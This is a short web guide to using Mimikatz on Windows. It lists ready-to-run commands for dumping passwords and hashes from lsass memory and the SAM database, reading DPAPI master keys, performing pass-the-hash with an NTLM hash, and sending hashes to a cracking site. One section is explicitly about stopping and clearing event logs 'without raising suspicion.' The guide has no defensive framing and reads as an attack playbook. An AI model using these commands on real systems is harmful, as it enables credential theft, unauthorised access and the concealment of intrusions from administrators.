Basic Guide to Mimikatz

Opening and Running

To get started, open CMD as an Administrator (Run as administrator). If you don't do this, Mimikatz will not be able to function and gain high-level privileges like NT SYSTEM.

Checking Privileges

To check if you have elevated privileges, use the following command:

privilege::debug

If you don't have the necessary privileges, you'll get an error message:

privilege::debug {ERROR MESSAGE = not admin}

Elevating Privileges

To elevate your privileges, use open tokens:

token::elevate

Saving Output to a File

If you'd like to save all of Mimikatz's output to a text file, use the following command:

log C:\fool.txt

Extracting Passwords and Hashes from RAM

To extract passwords and hashes from the lsass.exe process, use this command:

sekurlsa::logonpasswords

Extracting Information from the SAM

To extract users and hashes from the local SAM file, use this command:

lsadump::sam

Working with External Dump Files

To load an external dump file and work on it, use the following command:

sekurlsa::minidump "C:\Users\username\full_dump_file.dmp"

Then you can extract passwords from it:

sekurlsa::logonpasswords

Clearing Logs Without Raising Suspicion

To stop log creation and then clear them, use the following commands:

event::drop

event::clear

Cracking Hashes

If you have a hash, you can upload it to the following site and try to crack it:

https://crackstation.net

Working with DPAPI

To display the master key the system stores, use the following command:

sekurlsa::dpapi

Pass-the-Hash

To use an NTLM hash to authenticate, use this command:

token::elevate
sekurlsa::pth /user:USERNAME /domain:DOMAIN /ntlm:NTLMHASH

Summary

In this guide, we learned the following:

How to properly run Mimikatz
How to check and elevate privileges
How to extract passwords and hashes from RAM and SAM
How to work with external dump files
How to clear logs without raising alerts
How to crack hashes and work with DPAPI
How to perform Pass-the-Hash attacks

← Back to Home